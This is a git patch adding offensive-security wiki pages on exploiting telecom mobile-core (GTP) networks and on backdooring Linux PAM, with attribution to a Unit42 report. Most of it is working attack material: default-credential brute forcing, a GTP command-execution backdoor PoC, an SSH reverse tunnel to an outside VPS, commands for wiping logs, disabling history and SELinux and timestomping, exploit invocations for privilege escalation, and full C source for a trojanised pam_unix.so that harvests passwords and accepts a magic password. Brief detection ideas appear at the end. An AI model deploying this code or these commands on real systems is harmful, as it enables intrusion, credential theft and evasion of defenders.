From ab7951e069993b1f3bb9b81f92052b955482854b Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 30 Jul 2025 01:39:09 +0000 Subject: [PATCH] Add content from: The Covert Operator's Playbook: Infiltration of Global Telec... --- src/SUMMARY.md | 1 + .../pentesting-network/README.md | 7 + .../telecom-network-exploitation.md | 157 ++++++++++++++++++ .../pam-pluggable-authentication-modules.md | 58 +++++++ 4 files changed, 223 insertions(+) create mode 100644 src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index ad681ba950a..df1a7762a4f 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -21,6 +21,7 @@ - [Network Protocols Explained (ESP)](generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md) - [Nmap Summary (ESP)](generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md) - [Pentesting IPv6](generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md) + - [Telecom Network Exploitation](generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md) - [WebRTC DoS](generic-methodologies-and-resources/pentesting-network/webrtc-dos.md) - [Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks](generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) - [Spoofing SSDP and UPnP Devices with EvilSSDP](generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md) diff --git a/src/generic-methodologies-and-resources/pentesting-network/README.md b/src/generic-methodologies-and-resources/pentesting-network/README.md index 596c37cdf41..94c4fea52e2 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/README.md +++ b/src/generic-methodologies-and-resources/pentesting-network/README.md @@ -890,6 +890,13 @@ Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 19 Bettercap broadcast WSD packets searching for services (UDP Port 3702). + +### Telecom / Mobile-Core (GTP) Exploitation + +{{#ref}} +telecom-network-exploitation.md +{{#endref}} + ## References - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) diff --git a/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md new file mode 100644 index 00000000000..d9dbed83d71 --- /dev/null +++ b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md @@ -0,0 +1,157 @@ +# Telecom Network Exploitation (GTP / Roaming Environments) + +{{#include ../../banners/hacktricks-training.md}} + +> [!NOTE] +> Mobile-core protocols (GPRS Tunnelling Protocol – GTP) often traverse semi-trusted GRX/IPX roaming backbones. Because they ride on plain UDP with almost no authentication, **any foothold inside a telecom perimeter can usually reach core signalling planes directly**. The following notes collect offensive tricks observed in the wild against SGSN/GGSN, PGW/SGW and other EPC nodes. + +## 1. Recon & Initial Access + +### 1.1 Default OSS / NE Accounts +A surprisingly large set of vendor network elements ship with hard-coded SSH/Telnet users such as `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … A dedicated wordlist dramatically increases brute-force success: + +```bash +hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt +``` + +If the device exposes only a management VRF, pivot through a jump host first (see section «SGSN Emu Tunnel» below). + +### 1.2 Host Discovery inside GRX/IPX +Most GRX operators still allow **ICMP echo** across the backbone. Combine `masscan` with the built-in `gtpv1` UDP probes to quickly map GTP-C listeners: + +```bash +masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55 +``` + +## 2. Enumerating Subscribers – `cordscan` + +The following Go tool crafts **GTP-C Create PDP Context Request** packets and logs the responses. Each reply reveals the current **SGSN / MME** serving the queried IMSI and, sometimes, the subscriber’s visited PLMN. + +```bash +# Build +GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan + +# Usage (typical): +./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap +``` +Key flags: +- `--imsi` Target subscriber IMSI +- `--oper` Home / HNI (MCC+MNC) +- `-w` Write raw packets to pcap + +Important constants inside the binary can be patched to widen scans: + +``` +pingtimeout = 3 // seconds before giving up +pco = 0x218080 +common_tcp_ports = "22,23,80,443,8080" +``` + +## 3. Code Execution over GTP – `GTPDoor` + +`GTPDoor` is a tiny ELF service that **binds UDP 2123 and parses every incoming GTP-C packet**. When the payload starts with a pre-shared tag, the remainder is decrypted (AES-128-CBC) and executed via `/bin/sh -c`. The stdout/stderr are exfiltrated inside **Echo Response** messages so that no outward session is ever created. + +Minimal PoC packet (Python): + +```python +import gtpc, Crypto.Cipher.AES as AES +key = b"SixteenByteKey!" +cmd = b"id;uname -a" +enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00")) +print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc)) +``` + +Detection: +* any host sending **unbalanced Echo Requests** to SGSN IPs +* GTP version flag set to 1 while message type = 1 (Echo) – deviation from spec + +## 4. Pivoting Through the Core + +### 4.1 `sgsnemu` + SOCKS5 +`OsmoGGSN` ships an SGSN emulator able to **establish a PDP context towards a real GGSN/PGW**. Once negotiated, Linux receives a new `tun0` interface reachable from the roaming peer. + +```bash +sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \ + -APN internet -c 1 -d +ip route add 172.16.0.0/12 dev tun0 +microsocks -p 1080 & # internal SOCKS proxy +``` + +With proper firewall hair-pinning, this tunnel bypasses signalling-only VLANs and lands you directly in the **data plane**. + +### 4.2 SSH Reverse Tunnel over Port 53 +DNS is almost always open in roaming infrastructures. Expose an internal SSH service to your VPS listening on :53 and return later from home: + +```bash +ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com +``` +Check that `GatewayPorts yes` is enabled on the VPS. + +## 5. Covert Channels + +| Channel | Transport | Decoding | Notes | +|---------|-----------|----------|-------| +| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | pure passive listener, no outbound traffic | +| DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | watches for `*.nodep` sub-domain | +| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | blends with legitimate GTP-C chatter | + +All implants implement watchdogs that **timestomp** their binaries and re-spawn if crashed. + +## 6. Defense Evasion Cheatsheet + +```bash +# Remove attacker IPs from wtmp +utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp + +# Disable bash history +export HISTFILE=/dev/null + +# Masquerade as kernel thread +echo 0 > /proc/$$/autogroup # hide from top/htop +printf '\0' > /proc/$$/comm # appears as [kworker/1] + +touch -r /usr/bin/time /usr/bin/chargen # timestomp +setenforce 0 # disable SELinux +``` + +## 7. Privilege Escalation on Legacy NE + +```bash +# DirtyCow – CVE-2016-5195 +gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd + +# PwnKit – CVE-2021-4034 +python3 PwnKit.py + +# Sudo Baron Samedit – CVE-2021-3156 +python3 exploit_userspec.py +``` + +Clean-up tip: +```bash +userdel firefart 2>/dev/null +rm -f /tmp/sh ; history -c +``` + +## 8. Tool Box + +* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – custom tooling described in previous sections. +* `FScan` : intranet TCP sweeps (`fscan -p 22,80,443 10.0.0.0/24`) +* `Responder` : LLMNR/NBT-NS rogue WPAD +* `Microsocks` + `ProxyChains` : lightweight SOCKS5 pivoting +* `FRP` (≥0.37) : NAT traversal / asset bridging + +--- +## Detection Ideas +1. **Any device other than an SGSN/GGSN establishing Create PDP Context Requests**. +2. **Non-standard ports (53, 80, 443) receiving SSH handshakes** from internal IPs. +3. **Frequent Echo Requests without corresponding Echo Responses** – might indicate GTPDoor beacons. +4. **High rate of ICMP echo-reply traffic with large, non-zero identifier/sequence fields**. + +## References + +- [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/) +- 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0) +- 3GPP TS 29.281 – GTPv2-C (v17.6.0) + +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md b/src/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md index 407ab02078a..8d78b85ca98 100644 --- a/src/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md +++ b/src/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md @@ -48,9 +48,67 @@ Controls dictate the module's response to success or failure, influencing the ov In a setup with multiple auth modules, the process follows a strict order. If the `pam_securetty` module finds the login terminal unauthorized, root logins are blocked, yet all modules are still processed due to its "required" status. The `pam_env` sets environment variables, potentially aiding in user experience. The `pam_ldap` and `pam_unix` modules work together to authenticate the user, with `pam_unix` attempting to use a previously supplied password, enhancing efficiency and flexibility in authentication methods. + +## Backdooring PAM – Hooking `pam_unix.so` + +A classic persistence trick in high-value Linux environments is to **swap the legitimate PAM library with a trojanised drop-in**. Because every SSH / console login ends up calling `pam_unix.so:pam_sm_authenticate()`, a few lines of C are enough to capture credentials or implement a *magic* password bypass. + +### Compilation Cheatsheet +```c +#define _GNU_SOURCE +#include +#include +#include +#include +#include + +static int (*orig)(pam_handle_t *, int, int, const char **); +static const char *MAGIC = "Sup3rS3cret!"; + +int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv) { + const char *user, *pass; + pam_get_user(pamh, &user, NULL); + pam_get_authtok(pamh, PAM_AUTHTOK, &pass, NULL); + + /* Magic pwd → immediate success */ + if(pass && strcmp(pass, MAGIC) == 0) return PAM_SUCCESS; + + /* Credential harvesting */ + int fd = open("/usr/bin/.dbus.log", O_WRONLY|O_APPEND|O_CREAT, 0600); + dprintf(fd, "%s:%s\n", user, pass); + close(fd); + + /* Fall back to original function */ + if(!orig) { + orig = dlsym(RTLD_NEXT, "pam_sm_authenticate"); + } + return orig(pamh, flags, argc, argv); +} +``` + +Compile and stealth-replace: +```bash +gcc -fPIC -shared -o pam_unix.so trojan_pam.c -ldl -lpam +mv /lib/security/pam_unix.so /lib/security/pam_unix.so.bak +mv pam_unix.so /lib/security/pam_unix.so +chmod 644 /lib/security/pam_unix.so # keep original perms +touch -r /bin/ls /lib/security/pam_unix.so # timestomp +``` + +### OpSec Tips +1. **Atomic overwrite** – write to a temp file and `mv` into place to avoid half-written libraries that would lock out SSH. +2. Log file placement such as `/usr/bin/.dbus.log` blends with legitimate desktop artefacts. +3. Keep symbol exports identical (`pam_sm_setcred`, etc.) to avoid PAM mis-behaviour. + +### Detection +* Compare MD5/SHA256 of `pam_unix.so` against distro package. +* Check for world-writable or unusual ownership under `/lib/security/`. +* `auditd` rule: `-w /lib/security/pam_unix.so -p wa -k pam-backdoor`. + ### References - [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434) +- [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/) {{#include ../../banners/hacktricks-training.md}}